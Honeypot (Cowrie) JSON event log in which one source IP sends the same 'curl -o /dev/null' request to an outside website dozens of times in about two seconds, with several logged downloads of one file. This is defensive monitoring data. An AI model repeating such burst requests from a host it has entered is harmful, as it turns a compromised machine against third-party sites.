{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.603804Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:38.641835Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.642530Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:38.679556Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.680238Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:38.717958Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.718687Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:38.769162Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.769868Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:38.807356Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.808026Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:38.846346Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.847022Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:38.889173Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.889873Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:38.928824Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.929576Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.952333Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:38.967130Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.967825Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:39.005340Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.006071Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:39.043072Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.043749Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:39.082153Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.082833Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:39.120337Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.120994Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:39.168272Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.168950Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:39.206968Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.207717Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:39.245779Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.246477Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:39.286190Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.286898Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:39.323803Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.324321Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:39.361781Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.362478Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:39.399587Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.400098Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:39.438316Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.439046Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:39.475709Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.476428Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.508263Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:39.514749Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.515531Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:39.563536Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.564335Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:39.603736Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.604253Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.643035Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:39.644562Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.645584Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:39.685084Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.685900Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:39.723894Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.724648Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:39.764527Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.765270Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:39.802066Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.802779Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:39.840491Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.841179Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:39.879429Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.880121Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:39.922372Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.923086Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:39.972183Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:39.972873Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:40.012040Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.012797Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.027534Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:40.051274Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.051864Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:40.089169Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.090206Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:40.132938Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.133641Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:40.172236Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.172929Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:40.214821Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.215521Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:40.252286Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.252969Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:40.296220Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.297057Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.336967Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:40.338169Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.338717Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:40.389496Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.390226Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:40.427577Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.428292Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:40.467889Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.468581Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:40.509609Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.510290Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:40.550975Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.551636Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:40.589218Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.589854Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:40.628106Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.628780Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:40.668740Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.669697Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:40.707930Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.708863Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:40.746554Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.747319Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:40.796623Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.797356Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:40.835257Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.835941Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:40.873165Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.873865Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:40.913263Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.913928Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
